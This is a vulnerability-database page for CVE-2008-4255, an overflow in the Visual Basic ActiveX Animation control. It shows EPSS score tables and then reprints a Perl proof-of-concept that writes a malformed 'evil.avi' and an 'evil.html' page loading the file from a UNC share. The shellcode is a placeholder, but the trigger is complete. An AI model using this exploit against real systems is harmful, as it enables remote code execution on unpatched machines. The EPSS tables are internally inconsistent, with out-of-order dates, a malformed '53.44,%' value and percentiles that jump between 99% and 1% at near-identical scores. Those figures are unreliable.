CVE-2008-4255 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	72.65%	–	–
2023-03-12	–	–	–	96.67%	–
2023-03-19	–	–	–	96.71%	–
2023-09-03	–	–	–	96.71%	–
2023-10-15	–	–	–	96.66%	–
2023-11-19	–	–	–	96.62%	–
2023-12-24	–	–	–	96.78%	–
2024-02-04	–	–	–	96.46%	–
2024-02-11	–	–	–	96.46%	–
2024-03-10	–	–	–	96.78%	–
2024-06-02	–	–	–	96.75%	–
2024-06-23	–	–	–	96.62%	–
2024-09-01	–	–	–	96.45%	–
2024-10-06	–	–	–	96.62%	–
2024-12-22	–	–	–	94.12%	–
2025-01-26	–	–	–	93.84%	–
2025-03-02	–	–	–	94.51%	–
2025-01-19	–	–	–	94.12%	–
2025-01-25	–	–	–	93.84%	–
2025-03-09	–	–	–	94.51%	–
2025-03-18	–	–	–	–	53.44%
2025-03-18	–	–	–	–	53.44,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-03-19	99%
2023-09-03	1%
2023-10-15	1%
2023-11-19	1%
2023-12-24	1%
2024-02-04	99%
2024-02-11	1%
2024-03-10	1%
2024-06-02	1%
2024-06-23	1%
2024-09-01	1%
2024-10-06	1%
2024-12-22	99%
2025-01-26	99%
2025-03-02	99%
2025-01-19	99%
2025-01-25	99%
2025-03-09	99%
2025-03-18	98%
2025-03-18	98%

#!/usr/bin/perl # Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC # You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx # /JA # Come to FRHACK! # www.frhack.org print "\nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC\n"; print "Generating malicious .AVI file\n"; print "This file should be served via an UNC path\n"; print "[->] Building evil.avi\n"; my $shellcode = "http://metasploit.com"; $FileHeader = "\x52\x49\x46\x46\x2C\x08\x00\x00\x41\x56\x49\x20\x73\x74\x72\x68\x10\x00\x00\x00\x76\x69\x64\x73\x20\x20\x20\x20\x00\x00\x00\x00". "\x00\x00\x00\x00\x73\x74\x72\x66\x00\x08\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; open(my $poc, "> evil.avi"); print $poc $FileHeader; close($poc); print "[->] evil.avi generated\n"; print "[->] Building evil.html\n"; $EvilHTML = "<html><head></head><body><object id='evil' classid='clsid:B09DE715-87C1-11D1-8BE3-0000F8754DA1'><param name='AutoPlay' value='True'></object>". "<script language=javascript>evil.Open('\\\\192.168.0.1\\share\\evil.avi');</script></body></html>"; open(my $poc, "> evil.html"); print $poc $EvilHTML; close($poc); print "[->] evil.html generated\n"; # milw0rm.com [2008-12-12]